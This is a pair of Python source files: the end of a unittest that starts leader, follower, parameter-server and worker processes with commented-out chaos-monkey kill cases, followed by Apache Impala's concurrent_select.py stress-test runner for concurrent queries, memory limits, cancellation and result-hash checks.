tml = _Task(name="RunLeaderTM", target=run_leader_tm, args=(self.app_id,
self.data_source[role].data_source_meta.name,
master_addr[role].split(":")[1],), weight=1, force_quit=True,
kwargs={'env' : child_env}, daemon=True)
self.sche.submit(tml)
role = 1
tml = _Task(name="RunFollowerTM", target=run_follower_tm, args=(self.app_id,
self.data_source[role].data_source_meta.name,
master_addr[role].split(":")[1], ),
kwargs={'env' : child_env}, daemon=True, weight=1, force_quit=True)
self.sche.submit(tml)
## launch PS
for role in range(2):
name = "PS_%d" % role
psl = _Task(name=name, target=run_ps, args=(ps_addr[role].split(":")[1], ),
kwargs={'env' : child_env}, daemon=True, weight=1, force_quit=True)
self.sche.submit(psl)
## launch worker
worker_port, tf_port = 3050, 3150
for rank in range(total_worker_num):
port_fn = lambda port : ["0.0.0.0:%d" % port, "0.0.0.0:%d" % (port + 1)]
worker_addr = port_fn(worker_port)
tf_addr = port_fn(tf_port)
worker_port += 2
tf_port += 2
role = 0
ckpt_path, exp_path = make_ckpt_dir(role, "remote", rank)
args = Args(local_addr=worker_addr[role],
peer_addr=worker_addr[(role+1)%2],
tf_addr=tf_addr[role],
ps_addrs=ps_addr[role],
app_id=self.app_id,
worker_rank = rank,
master_addr=master_addr[role],
ckpt_path=ckpt_path,
export_path=exp_path)
ftm = _Task(name="RunLeaderTW" + str(rank), target=run_lm, args=(args, ),
kwargs={'env' : child_env}, daemon=True, weight=2)
self.sche.submit(ftm)
role = 1
ckpt_path, exp_path = make_ckpt_dir(role, "remote", rank)
args = Args(local_addr=worker_addr[role],
peer_addr=worker_addr[(role+1)%2],
tf_addr=tf_addr[role],
ps_addrs=ps_addr[role],
app_id=self.app_id,
worker_rank = rank,
master_addr=master_addr[role],
ckpt_path=ckpt_path,
export_path=exp_path)
ftm = _Task(name="RunFollowerTW" + str(rank), target=run_fm, args=(args, ),
kwargs={'env' : child_env}, daemon=True, weight=2)
self.sche.submit(ftm)
# mimic the chaos monkey
# case 1: worker restarts itself
#e = _Event("RunFollowerTW", _Signal.KILL, 10)
#self.sche.recv(e)
# case 1: as above
#e = _Event("RunFollowerTM", _Signal.KILL, 10)
#self.sche.recv(e)
# case 2: master fails, but worker is running, master must not alloc data
#e = _Event("RunLeaderTM", _Signal.KILL, 35)
#self.sche.recv(e)
"""case 3: master fails, then force worker to restart, cluster get recovered
netstat -apn | grep "0.0.0.0:40" | awk -F" " '{print $7}' | awk -F "\/" '{print $1}' | xargs kill
netstat -apn | grep "0.0.0.0:30" | awk -F" " '{print $7}' | awk -F "\/" '{print $1}' | xargs kill
netstat -apn | grep "0.0.0.0:50" | awk -F" " '{print $7}' | awk -F "\/" '{print $1}' | xargs kill
"""
self.sche.run()
def tearDown(self):
self.sche.bye()
#if not debug_mode and gfile.Exists(output_path):
# gfile.DeleteRecursively(output_path)
if __name__ == '__main__':
unittest.main()
|
concurrent_select.py
|
#!/usr/bin/env impala-python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# This module is used to stress test Impala by running queries concurrently.
#
# Stress test outline (and notes):
# 1) Get a set of queries as requested by the user from the CLI options.
# 2) For each query, run it individually to find:
# a) Minimum mem limit to avoid spilling
# b) Minimum mem limit to successfully run the query (spilling allowed)
# c) Runtime when no mem was spilled
# d) Runtime when mem was spilled
# e) A row order independent hash of the result set.
# This is a slow process so the results will be written to disk for reuse.
# 3) Find the memory available to Impalad. This will be done by finding the minimum
# memory available across all impalads (-mem_limit startup option). Ideally, for
# maximum stress, all impalads will have the same memory configuration but this is
# not required.
# 4) Optionally, set an amount of memory that can be overcommitted. Overcommitting
# memory can increase memory pressure which can result in memory being spilled to
# disk or queries failing with out-of-memory.
# 5) Start submitting queries. There are two modes for throttling the number of
# concurrent queries, depending on --test-admission-control.
# a) test-admission-control=false: Submit queries until all available memory (as
# determined by items 3 and 4) is used. Before running the query a query mem
# limit is set between 2a and 2b. (There is a runtime option to increase the
# likelihood that a query will be given the full 2a limit to avoid spilling.)
# b) test-admission-control=true: Submit enough queries to achieve the desired
# level of overcommit, but expect that Impala's admission control will throttle
# queries. In this mode mem_limit is not set per query.
# 6) Randomly cancel queries to test cancellation. There is a runtime option to control
# the likelihood that a query will be randomly canceled.
# 7) If a query errored, verify that the error is expected. Errors are expected in the
# following cases:
# a) Memory-based admission control is not being tested (i.e.
# --test-admission-control=false), the error is an out-of-memory error and memory
# on the cluster is overcommitted.
# b) The error is an admission control rejection or timeout.
# 8) Verify the result set hash of successful queries if there are no DML queries in the
# current run.
from __future__ import print_function
import logging
import os
import re
import signal
import sys
import threading
from Queue import Empty # Must be before Queue below
from argparse import ArgumentDefaultsHelpFormatter, ArgumentParser, Namespace, SUPPRESS
from collections import defaultdict
from copy import copy
from datetime import datetime
from multiprocessing import Lock, Process, Queue, Value
from random import choice, random, randrange, shuffle
from sys import exit, maxint
from tempfile import gettempdir
from textwrap import dedent
from threading import current_thread
from time import sleep, time
import tests.comparison.cli_options as cli_options
from tests.comparison.cluster import Timeout
from tests.comparison.db_types import Int, TinyInt, SmallInt, BigInt
from tests.stress.mem_broker import MemBroker
from tests.stress.runtime_info import save_runtime_info, load_runtime_info
from tests.stress.queries import (QueryType, generate_compute_stats_queries,
generate_DML_queries, generate_random_queries, load_tpc_queries,
load_queries_from_test_file, estimate_query_mem_mb_usage)
from tests.stress.query_runner import (QueryRunner, QueryTimeout,
NUM_QUERIES_DEQUEUED, NUM_QUERIES_SUBMITTED, NUM_QUERIES_STARTED_RUNNING_OR_CANCELLED,
NUM_QUERIES_FINISHED, NUM_QUERIES_EXCEEDED_MEM_LIMIT, NUM_QUERIES_AC_REJECTED,
NUM_QUERIES_AC_TIMEDOUT, NUM_QUERIES_CANCELLED, NUM_RESULT_MISMATCHES,
NUM_OTHER_ERRORS, RESULT_HASHES_DIR, CancelMechanism)
from tests.stress.util import create_and_start_daemon_thread, increment, print_stacks
from tests.util.parse_util import (
EXPECTED_TPCDS_QUERIES_COUNT, EXPECTED_TPCH_NESTED_QUERIES_COUNT,
EXPECTED_TPCH_STRESS_QUERIES_COUNT)
LOG = logging.getLogger(os.path.splitext(os.path.basename(__file__))[0])
PROFILES_DIR = "profiles"
class StressArgConverter(object):
def __init__(self, args):
"""
Convert arguments as returned from argparse parse_args() into internal forms.
The purpose of this object is to do any conversions needed from the type given by
parse_args() into internal forms. For example, if a commandline option takes in a
complicated string that needs to be converted into a list or dictionary, this is the
place to do it. Access works the same as on the object returned by parse_args(),
i.e., object.option_attribute.
In most cases, simple arguments needn't be converted, because argparse handles the
type conversion already, and in most cases, type conversion (e.g., "8" <str> to 8
<int>) is all that's needed. If a property getter below doesn't exist, it means the
argument value is just passed along unconverted.
Params:
args: argparse.Namespace object (from argparse.ArgumentParser().parse_args())
"""
assert isinstance(args, Namespace), "expected Namespace, got " + str(type(args))
self._args = args
self._common_query_options = None
def __getattr__(self, attr):
# This "proxies through" all the attributes from the Namespace object that are not
# defined in this object via property getters below.
return getattr(self._args, attr)
@property
def common_query_options(self):
# Memoize this, as the integrity checking of --common-query-options need only
# happen once.
if self._common_query_options is not None:
return self._common_query_options
# The stress test sets these, so callers cannot override them.
IGNORE_QUERY_OPTIONS = frozenset([
'ABORT_ON_ERROR',
'MEM_LIMIT',
])
common_query_options = {}
if self._args.common_query_options is not None:
for query_option_and_value in self._args.common_query_options:
try:
query_option, value = query_option_and_value.split('=')
except ValueError:
LOG.error(
"Could not parse --common-query-options: '{common_query_options}'".format(
common_query_options=self._args.common_query_options))
exit(1)
query_option = query_option.upper()
if query_option in common_query_options:
LOG.error(
"Query option '{query_option}' already defined in --common-query-options: "
"'{common_query_options}'".format(
query_option=query_option,
common_query_options=self._args.common_query_options))
exit(1)
elif query_option in IGNORE_QUERY_OPTIONS:
LOG.warn(
"Ignoring '{query_option}' in common query options: '{opt}': "
"The stress test algorithm needs control of this option.".format(
query_option=query_option, opt=self._args.common_query_options))
else:
common_query_options[query_option] = value
LOG.debug("Common query option '{query_option}' set to '{value}'".format(
query_option=query_option, value=value))
self._common_query_options = common_query_options
return self._common_query_options
@property
def runtime_info_path(self):
runtime_info_path = self._args.runtime_info_path
if "{cm_host}" in runtime_info_path:
runtime_info_path = runtime_info_path.format(cm_host=self._args.cm_host)
return runtime_info_path
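# Illustrative usage sketch for StressArgConverter (a hypothetical helper; the stress test does
# not call it). The Namespace below is a hand-built stand-in for what argparse would produce,
# and the query option name is only an example value.
def _example_stress_arg_conversion():
  example_args = Namespace(
      common_query_options=["EXEC_TIME_LIMIT_S=600"],
      runtime_info_path=os.path.join(gettempdir(), "runtime_info.json"),
      cm_host=None)
  converted = StressArgConverter(example_args)
  # Simple attributes proxy straight through via __getattr__; --common-query-options is parsed
  # into a dict of upper-cased option names mapped to their string values.
  return converted.runtime_info_path, converted.common_query_options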
# To help debug hangs, the stacks of all threads can be printed by sending signal USR1
# to each process.
signal.signal(signal.SIGUSR1, print_stacks)
def print_crash_info_if_exists(impala, start_time):
"""If any impalads are found not running, they will assumed to have crashed and an
error message will be printed to stderr for each stopped impalad. Returns a value
that evaluates to True if any impalads are stopped.
"""
max_attempts = 5
for remaining_attempts in xrange(max_attempts - 1, -1, -1):
try:
crashed_impalads = impala.find_crashed_impalads(start_time)
break
except Timeout as e:
LOG.info(
"Timeout checking if impalads crashed: %s."
% e + (" Will retry." if remaining_attempts else ""))
else:
LOG.error(
"Aborting after %s failed attempts to check if impalads crashed", max_attempts)
raise e
for message in crashed_impalads.itervalues():
print(message, file=sys.stderr)
return crashed_impalads
class StressRunner(object):
"""This class contains functionality related to producing/consuming queries for the
purpose of stress testing Impala.
Queries will be executed in separate processes since python threading is limited
to the use of a single CPU.
"""
# This is the point at which the work queue will block because it is full.
WORK_QUEUE_CAPACITY = 10
def __init__(self):
self.use_kerberos = False
self.common_query_options = {}
self.test_admission_control = False
self._mem_broker = None
self._verify_results = True
self._select_probability = None
# Synchronized blocking work queue for producer/consumers.
self._query_queue = Queue(self.WORK_QUEUE_CAPACITY)
# The Value class provides cross-process shared memory.
self._mem_mb_needed_for_next_query = Value("i", 0)
# This lock provides a way to stop new queries from running. This lock must be
# acquired before writing to the NUM_QUERIES_SUBMITTED metric for the query_runner,
# which is incremented before every query submission. Reading NUM_QUERIES_SUBMITTED is
# allowed without taking this lock.
self._submit_query_lock = Lock()
self.leak_check_interval_mins = None
self._next_leak_check_unix_time = Value("i", 0)
self._max_mem_mb_reported_usage = Value("i", -1) # -1 => Unknown
self._max_mem_mb_usage = Value("i", -1) # -1 => Unknown
self.cancel_probability = 0
self.spill_probability = 0
self.startup_queries_per_sec = 1.0
self.num_successive_errors_needed_to_abort = 1
self._num_successive_errors = Value("i", 0)
self.results_dir = gettempdir()
self._status_headers = [
"Done", "Active", "Executing", "Mem Lmt Ex", "AC Reject", "AC Timeout",
"Cancel", "Err", "Incorrect", "Next Qry Mem Lmt",
"Tot Qry Mem Lmt", "Tracked Mem", "RSS Mem"]
self._num_queries_to_run = None
self._query_producer_thread = None
# This lock is used to synchronize access to the '_query_runners' list and also to all
# the '_past_runners*' members.
self._query_runners_lock = Lock()
self._query_runners = []
# These are the cumulative values of all the queries that have started/finished/dequeued,
# etc. on runners that have already died. Every time we notice that a query
# runner has died, we update these values.
self._past_runner_metrics = defaultdict(lambda: Value("i", 0))
self._query_consumer_thread = None
self._mem_polling_thread = None
def _record_runner_metrics_before_evict(self, query_runner):
""" Before removing 'query_runner' from the self._query_runners list, record its
metrics. Must only be called if 'query_runner' is to be removed from the list.
MUST hold '_query_runners_lock' before calling.
"""
for key, val in query_runner.get_metric_vals():
self._past_runner_metrics[key].value += val
def _calc_total_runner_metrics(self):
""" Calculate the total of metrics across past and active query runners. """
totals = defaultdict(lambda: 0)
with self._query_runners_lock:
for key in self._past_runner_metrics:
totals[key] = self._past_runner_metrics[key].value
for query_runner in self._query_runners:
for key, val in query_runner.get_metric_vals():
totals[key] += val
return totals
def _calc_total_runner_metric(self, key):
""" Calculate the total of metric 'key' across past and active query runners. """
with self._query_runners_lock:
return self._calc_total_runner_metric_no_lock(key)
def _calc_total_runner_metric_no_lock(self, key):
""" TODO: Get rid of this function after reformatting how we obtain query indices.
_query_runners_lock MUST be taken before calling this function.
"""
total = self._past_runner_metrics[key].value
for runner in self._query_runners:
total += runner.get_metric_val(key)
return total
def _total_num_queries_submitted(self):
return self._calc_total_runner_metric(NUM_QUERIES_SUBMITTED)
def _total_num_queries_active(self):
"""The number of queries that are currently active (i.e. submitted to a query runner
and haven't yet completed)."""
metrics = self._calc_total_runner_metrics()
num_running = metrics[NUM_QUERIES_SUBMITTED] - metrics[NUM_QUERIES_FINISHED]
assert num_running >= 0, "The number of running queries is negative"
return num_running
def _num_runners_remaining(self):
return len(self._query_runners)
def run_queries(
self, queries, impala, num_queries_to_run, mem_overcommit_pct, should_print_status,
verify_results, select_probability
):
"""Runs queries randomly chosen from 'queries' and stops after 'num_queries_to_run'
queries have completed. 'select_probability' should be float between 0 and 1, it
determines the likelihood of choosing a select query (as opposed to a DML query,
for example).
Before a query is run, a mem limit will be chosen. 'spill_probability' determines
the likelihood of choosing a mem limit that will cause spilling. To induce
spilling, a value is randomly chosen below the min memory needed to avoid spilling
but above the min memory needed with spilling. So the min/max query memory
requirements must be determined before calling this method.
If 'mem_overcommit_pct' is zero, an exception will be raised if any queries
fail for any reason other than cancellation (controlled by the 'cancel_probability'
property), since each query should have enough memory to run successfully. If
non-zero, failures due to insufficient memory will be ignored if memory was
overcommitted at any time during execution.
If a query completes without error, the result will be verified if 'verify_results'
is True. An error will be raised upon a result mismatch. 'verify_results' should be
false for the case where the expected results are not known in advance, if we are
running DML queries, for example.
"""
# TODO: The state from a previous run should be cleared out. This isn't really a
# problem now because the one caller (main()) never calls a second time.
if self.startup_queries_per_sec <= 0:
raise Exception("Startup queries per second must be positive")
if self.leak_check_interval_mins is not None and self.leak_check_interval_mins <= 0:
raise Exception("Memory leak check interval must be positive")
# If there is a crash, start looking for errors starting from this time.
self.start_time = datetime.now()
self._mem_broker = MemBroker(
impala.min_impalad_mem_mb,
int(impala.min_impalad_mem_mb * mem_overcommit_pct / 100))
self._verify_results = verify_results
self._select_probability = select_probability
# Print the status to show the state before starting.
if should_print_status:
self._print_status(print_header=True)
self._num_queries_to_run = num_queries_to_run
self._start_polling_mem_usage(impala)
self._start_producing_queries(queries)
self._start_consuming_queries(impala)
# Wait for everything to finish.
self._wait_for_test_to_finish(impala, should_print_status)
# And print the final state.
if should_print_status:
self._print_status()
self._check_for_test_failure()
self.print_duration()
def _start_producing_queries(self, queries):
def enqueue_queries():
# Generate a dict(query type -> list of queries).
queries_by_type = {}
for query in queries:
if query.query_type not in queries_by_type:
queries_by_type[query.query_type] = []
queries_by_type[query.query_type].append(query)
try:
for _ in xrange(self._num_queries_to_run):
# First randomly determine a query type, then choose a random query of that
# type.
if (
QueryType.SELECT in queries_by_type and
(len(queries_by_type.keys()) == 1 or random() < self._select_probability)
):
result = choice(queries_by_type[QueryType.SELECT])
else:
query_type = choice([
key for key in queries_by_type if key != QueryType.SELECT])
result = choice(queries_by_type[query_type])
self._query_queue.put(result)
except Exception as e:
LOG.error("Error producing queries: %s", e)
current_thread().error = e
raise e
LOG.info("Producing thread completed job. Exiting...")
self._query_producer_thread = create_and_start_daemon_thread(
enqueue_queries, "Query Producer")
def _start_consuming_queries(self, impala):
def start_additional_runners_if_needed():
try:
while self._total_num_queries_submitted() < self._num_queries_to_run:
# TODO: sleeping for the below amount leads to slower submission than the goal,
# because it does not factor in the time spent by this thread outside of the
# sleep() call.
sleep(1.0 / self.startup_queries_per_sec)
# Remember num dequeued/started are cumulative.
with self._submit_query_lock:
metrics = self._calc_total_runner_metrics()
num_dequeued = metrics[NUM_QUERIES_DEQUEUED]
num_submitted = metrics[NUM_QUERIES_SUBMITTED]
LOG.debug("Submitted {0} queries. Dequeued {1} queries".format(
num_submitted, num_dequeued))
if num_dequeued != num_submitted:
# Assume dequeued queries are stuck waiting for cluster resources so there
# is no point in starting an additional runner.
continue
num_coordinators = len(impala.impalads)
if self.max_coordinators > 0:
num_coordinators = min(num_coordinators, self.max_coordinators)
impalad = impala.impalads[len(self._query_runners) % num_coordinators]
query_runner = QueryRunner(impalad=impalad, results_dir=self.results_dir,
use_kerberos=self.use_kerberos,
common_query_options=self.common_query_options,
test_admission_control=self.test_admission_control)
query_runner.proc = \
Process(target=self._start_single_runner, args=(query_runner, ))
query_runner.proc.daemon = True
with self._query_runners_lock:
self._query_runners.append(query_runner)
query_runner.proc.start()
LOG.info("Consuming thread completed job. Exiting...")
except Exception as e:
LOG.error("Error consuming queries: %s", e)
current_thread().error = e
raise e
self._query_consumer_thread = create_and_start_daemon_thread(
start_additional_runners_if_needed, "Query Consumer")
def _start_polling_mem_usage(self, impala):
def poll_mem_usage():
if self.leak_check_interval_mins:
self._next_leak_check_unix_time.value = int(
time() + 60 * self.leak_check_interval_mins)
query_submission_is_locked = False
# Query submission will be unlocked after a memory report has been collected twice
# while no queries were running.
ready_to_unlock = None
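# Lock/unlock sequence (comment added for clarity): submission is locked below,
# then the first mem poll that sees no active queries sets ready_to_unlock to
# False, the second sets it to True, and the next loop iteration releases the
# lock and schedules the following leak check.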
try:
while self._total_num_queries_submitted() < self._num_queries_to_run:
if ready_to_unlock:
assert query_submission_is_locked, "Query submission not yet locked"
assert not self._total_num_queries_active(), "Queries are still running"
LOG.debug("Resuming query submission")
self._next_leak_check_unix_time.value = int(
time() + 60 * self.leak_check_interval_mins)
self._submit_query_lock.release()
query_submission_is_locked = False
ready_to_unlock = None
if (
not query_submission_is_locked and
self.leak_check_interval_mins and
time() > self._next_leak_check_unix_time.value
):
assert self._total_num_queries_active() <= self._num_runners_remaining(), \
"Each running query should belong to a runner"
LOG.debug("Stopping query submission")
self._submit_query_lock.acquire()
query_submission_is_locked = True
max_reported, max_actual = self._get_mem_usage_values()
if max_reported != -1 and max_actual != -1:
# Values were already retrieved but haven't been used yet. Assume newer
# values aren't wanted and check again later.
sleep(1)
continue
try:
max_reported = max(impala.find_impalad_mem_mb_reported_usage())
except Timeout:
LOG.debug("Timeout collecting reported mem usage")
max_reported = -1
try:
max_actual = max(impala.find_impalad_mem_mb_actual_usage())
except Timeout:
LOG.debug("Timeout collecting reported actual usage")
max_actual = -1
self._set_mem_usage_values(max_reported, max_actual)
if query_submission_is_locked and not self._total_num_queries_active():
if ready_to_unlock is None:
ready_to_unlock = False
else:
ready_to_unlock = True
except Exception:
LOG.debug("Error collecting impalad mem usage", exc_info=True)
if query_submission_is_locked:
LOG.debug("Resuming query submission")
self._submit_query_lock.release()
self._mem_polling_thread = create_and_start_daemon_thread(
poll_mem_usage, "Mem Usage Poller")
def _get_mem_usage_values(self, reset=False):
reported = None
actual = None
with self._max_mem_mb_reported_usage.get_lock():
with self._max_mem_mb_usage.get_lock():
reported = self._max_mem_mb_reported_usage.value
actual = self._max_mem_mb_usage.value
if reset:
self._max_mem_mb_reported_usage.value = -1
self._max_mem_mb_usage.value = -1
return reported, actual
def _set_mem_usage_values(self, reported, actual):
with self._max_mem_mb_reported_usage.get_lock():
with self._max_mem_mb_usage.get_lock():
self._max_mem_mb_reported_usage.value = reported
self._max_mem_mb_usage.value = actual
def _start_single_runner(self, query_runner):
"""Consumer function to take a query of the queue and run it. This is intended to
run in a separate process so validating the result set can use a full CPU.
"""
LOG.debug("New query runner started")
# The query runner should already be set up. We just need to connect() before using
# the runner.
query_runner.connect()
while not self._query_queue.empty():
try:
query = self._query_queue.get(True, 1)
except Empty:
continue
except EOFError:
LOG.debug("Query running aborting due to closed query queue")
break
LOG.debug("Getting query_idx")
with self._query_runners_lock:
query_idx = self._calc_total_runner_metric_no_lock(NUM_QUERIES_DEQUEUED)
query_runner.increment_metric(NUM_QUERIES_DEQUEUED)
LOG.debug("Query_idx: {0} | PID: {1}".format(query_idx, query_runner.proc.pid))
if not query.required_mem_mb_without_spilling:
mem_limit = query.required_mem_mb_with_spilling
solo_runtime = query.solo_runtime_secs_with_spilling
elif self.spill_probability < random():
mem_limit = query.required_mem_mb_without_spilling
solo_runtime = query.solo_runtime_secs_without_spilling
else:
mem_limit = randrange(
query.required_mem_mb_with_spilling,
query.required_mem_mb_without_spilling + 1)
solo_runtime = query.solo_runtime_secs_with_spilling
LOG.debug("Waiting for other query runners to start their queries")
while query_idx > self._total_num_queries_submitted():
sleep(0.1)
self._mem_mb_needed_for_next_query.value = mem_limit
LOG.debug("Requesting memory reservation")
with self._mem_broker.reserve_mem_mb(mem_limit) as reservation_id:
LOG.debug("Received memory reservation")
with self._submit_query_lock:
query_runner.increment_metric(NUM_QUERIES_SUBMITTED)
cancel_mech = None
if self.cancel_probability > random():
# Exercise both timeout mechanisms.
if random() > 0.5:
cancel_mech = CancelMechanism.VIA_CLIENT
else:
cancel_mech = CancelMechanism.VIA_OPTION
timeout = randrange(1, max(int(solo_runtime), 2))
else:
# Let the query run as long as necessary - it is nearly impossible to pick a
# good value that won't have false positives under load - see IMPALA-8222.
timeout = maxint
report = query_runner.run_query(query, mem_limit, timeout_secs=timeout,
cancel_mech=cancel_mech)
LOG.debug("Got execution report for query")
if report.timed_out and cancel_mech:
report.was_cancelled = True
query_runner.update_from_query_report(report)
if report.other_error:
error_msg = str(report.other_error)
# There is a possible race during cancellation. If a fetch request fails (for
# example due to hitting a mem limit), just before the cancellation request, the
# server may have already unregistered the query as part of the fetch failure.
# In that case the server gives an error response saying the handle is invalid.
if "Invalid or unknown query handle" in error_msg and report.timed_out:
self._num_successive_errors.value = 0
continue
# Occasionally the network connection will fail, and depending on when the
# failure occurred during run_query(), an attempt to get the profile may be
# made which results in "Invalid session id" since the server destroyed the
# session upon disconnect.
if "Invalid session id" in error_msg:
self._num_successive_errors.value = 0
continue
# The server may fail to respond to clients if the load is high. An error
# message with "connect()...Connection timed out" comes from the impalad so
# that will not be ignored.
if (
("Connection timed out" in error_msg and "connect()" not in error_msg) or
"ECONNRESET" in error_msg or
"couldn't get a client" in error_msg or
"timeout: timed out" in error_msg
):
self._num_successive_errors.value = 0
continue
increment(self._num_successive_errors)
query_runner.increment_metric(NUM_OTHER_ERRORS)
self._write_query_profile(report, PROFILES_DIR, prefix='error')
raise Exception("Query {query} ID {id} failed: {mesg}".format(
query=query.logical_query_id,
id=report.query_id,
mesg=error_msg))
if (
report.not_enough_memory and (self.test_admission_control or
not self._mem_broker.was_overcommitted(reservation_id))
):
increment(self._num_successive_errors)
self._write_query_profile(
report, PROFILES_DIR, prefix='unexpected_mem_exceeded')
raise Exception("Unexpected mem limit exceeded; mem was not overcommitted. "
"Query ID: {0}".format(report.query_id))
if (
not report.timed_out and not report.has_query_error() and
(self._verify_results and report.result_hash != query.result_hash)
):
increment(self._num_successive_errors)
query_runner.increment_metric(NUM_RESULT_MISMATCHES)
self._write_query_profile(report, PROFILES_DIR, prefix='incorrect_results')
raise Exception(dedent("""\
Result hash mismatch; expected {expected}, got {actual}
Query ID: {id}
Query: {query}""".format(expected=query.result_hash,
actual=report.result_hash,
id=report.query_id,
query=query.logical_query_id)))
if report.timed_out and not cancel_mech:
self._write_query_profile(report, PROFILES_DIR, prefix='timed_out')
raise Exception(
"Query {query} unexpectedly timed out. Query ID: {id}".format(
query=query.logical_query_id, id=report.query_id))
self._num_successive_errors.value = 0
LOG.debug("Query runner completed...")
def _print_status_header(self):
print(" | ".join(self._status_headers))
def _print_status(self, print_header=False):
if print_header:
self._print_status_header()
metrics = self._calc_total_runner_metrics()
reported_mem, actual_mem = self._get_mem_usage_values(reset=True)
status_format = " | ".join(["%%%ss" % len(header) for header in self._status_headers])
print(status_format % (
# Done
metrics[NUM_QUERIES_FINISHED],
# Active
metrics[NUM_QUERIES_SUBMITTED] - metrics[NUM_QUERIES_FINISHED],
# Executing
metrics[NUM_QUERIES_STARTED_RUNNING_OR_CANCELLED] -
metrics[NUM_QUERIES_FINISHED],
# Mem Lmt Ex
metrics[NUM_QUERIES_EXCEEDED_MEM_LIMIT],
# AC Rejected
metrics[NUM_QUERIES_AC_REJECTED],
# AC Timed Out
metrics[NUM_QUERIES_AC_TIMEDOUT],
# Cancel
metrics[NUM_QUERIES_CANCELLED],
# Err
metrics[NUM_OTHER_ERRORS],
# Incorrect
metrics[NUM_RESULT_MISMATCHES],
# Next Qry Mem Lmt
self._mem_mb_needed_for_next_query.value,
# Total Qry Mem Lmt
self._mem_broker.total_mem_mb - self._mem_broker.available_mem_mb,
# Tracked Mem
"" if reported_mem == -1 else reported_mem,
# RSS Mem
"" if actual_mem == -1 else actual_mem))
def _write_query_profile(self, report, subdir, prefix=None):
report.write_query_profile(
os.path.join(self.results_dir, subdir),
prefix)
def _check_successive_errors(self):
if (self._num_successive_errors.value >= self.num_successive_errors_needed_to_abort):
print(
"Aborting due to %s successive errors encountered"
% self._num_successive_errors.value, file=sys.stderr)
self.print_duration()
sys.exit(1)
def _check_for_test_failure(self):
metrics = self._calc_total_runner_metrics()
if metrics[NUM_OTHER_ERRORS] > 0 or metrics[NUM_RESULT_MISMATCHES] > 0:
LOG.error("Failing the stress test due to unexpected errors, incorrect results, or "
"timed out queries. See the report line above for details.")
self.print_duration()
sys.exit(1)
def _wait_for_test_to_finish(self, impala, should_print_status):
last_report_secs = 0
lines_printed = 1
sleep_secs = 0.1
num_runners_remaining = self._num_runners_remaining()
while (
self._query_producer_thread.is_alive() or
self._query_consumer_thread.is_alive() or
num_runners_remaining
):
if self._query_producer_thread.error or self._query_consumer_thread.error:
# This is bad enough to abort early. A failure here probably means there's a
# bug in this script. The mem poller could be checked for an error too. It is
# not critical so is ignored.
LOG.error("Aborting due to error in producer/consumer")
sys.exit(1)
do_check_for_impala_crashes = False
with self._query_runners_lock:
for idx, runner in enumerate(self._query_runners):
if runner.proc.exitcode is not None:
if runner.proc.exitcode != 0:
# Since at least one query runner process failed, make sure to check for
# crashed impalads.
do_check_for_impala_crashes = True
# TODO: Handle case for num_queries_dequeued != num_queries_submitted
num_submitted = runner.get_metric_val(NUM_QUERIES_SUBMITTED)
num_started_or_cancelled = \
runner.get_metric_val(NUM_QUERIES_STARTED_RUNNING_OR_CANCELLED)
num_finished = runner.get_metric_val(NUM_QUERIES_FINISHED)
if num_submitted != num_finished:
# The query runner process may have crashed before updating the number
# of finished queries but after it incremented the number of queries
# submitted.
assert num_submitted - num_finished == 1
runner.increment_metric(NUM_QUERIES_FINISHED)
if num_submitted != num_started_or_cancelled:
assert num_submitted - num_started_or_cancelled == 1
runner.increment_metric(NUM_QUERIES_STARTED_RUNNING_OR_CANCELLED)
# Since we know that the runner crashed while trying to run a query, we
# count it as an 'other error'
runner.increment_metric(NUM_OTHER_ERRORS)
self._check_successive_errors()
assert runner.get_metric_val(NUM_QUERIES_SUBMITTED) == \
runner.get_metric_val(NUM_QUERIES_FINISHED), \
str(runner.get_metric_vals())
# Make sure to record all the metrics before removing this runner from the
# list.
print("Query runner ({0}) exited with exit code {1}".format(
runner.proc.pid, runner.proc.exitcode))
self._record_runner_metrics_before_evict(self._query_runners[idx])
# Remove the query runner from the list.
del self._query_runners[idx]
if do_check_for_impala_crashes:
# Since we know that at least one query runner failed, check if any of the Impala
# daemons themselves crashed.
LOG.info("Checking for Impala crashes")
if print_crash_info_if_exists(impala, self.start_time):
self.print_duration()
sys.exit(runner.proc.exitcode)
do_check_for_impala_crashes = False
LOG.info("No Impala crashes detected")
sleep(sleep_secs)
num_runners_remaining = self._num_runners_remaining()
if should_print_status:
last_report_secs += sleep_secs
if last_report_secs > 5:
if (
not self._query_producer_thread.is_alive() or
not self._query_consumer_thread.is_alive() or
not num_runners_remaining
):
LOG.debug("Producer is alive: %s" % self._query_producer_thread.is_alive())
LOG.debug("Consumer is alive: %s" % self._query_consumer_thread.is_alive())
LOG.debug("Queue size: %s" % self._query_queue.qsize())
LOG.debug("Runners: %s" % num_runners_remaining)
last_report_secs = 0
lines_printed %= 50
self._print_status(print_header=(lines_printed == 0))
lines_printed += 1
def print_duration(self):
duration = datetime.now() - self.start_time
LOG.info("Test Duration: {0:.0f} seconds".format(duration.total_seconds()))
def load_random_queries_and_populate_runtime_info(impala, converted_args):
"""Returns a list of random queries. Each query will also have its runtime info
populated. The runtime info population also serves to validate the query.
"""
LOG.info("Generating random queries")
return populate_runtime_info_for_random_queries(
impala, generate_random_queries(impala, converted_args.random_db), converted_args)
def populate_runtime_info_for_random_queries(impala, candidate_queries, converted_args):
"""Returns a list of random queries selected from candidate queries, which should be
a generator that will return an unlimited number of randomly generated queries.
Each query will also have its runtime info populated. The runtime info population
also serves to validate the query.
"""
start_time = datetime.now()
queries = list()
# TODO(IMPALA-4632): Consider running reset_databases() here if we want to extend DML
# functionality to random stress queries as well.
for query in candidate_queries:
try:
populate_runtime_info(
query, impala, converted_args,
timeout_secs=converted_args.random_query_timeout_seconds)
queries.append(query)
except Exception as e:
# Ignore any non-fatal errors. These could be query timeouts or bad queries (
# query generator bugs).
if print_crash_info_if_exists(impala, start_time):
raise e
LOG.warn(
"Error running query (the test will continue)\n%s\n%s",
e, query.sql, exc_info=True)
if len(queries) == converted_args.random_query_count:
break
return queries
def populate_runtime_info(query, impala, converted_args, timeout_secs=maxint):
"""Runs the given query by itself repeatedly until the minimum memory is determined
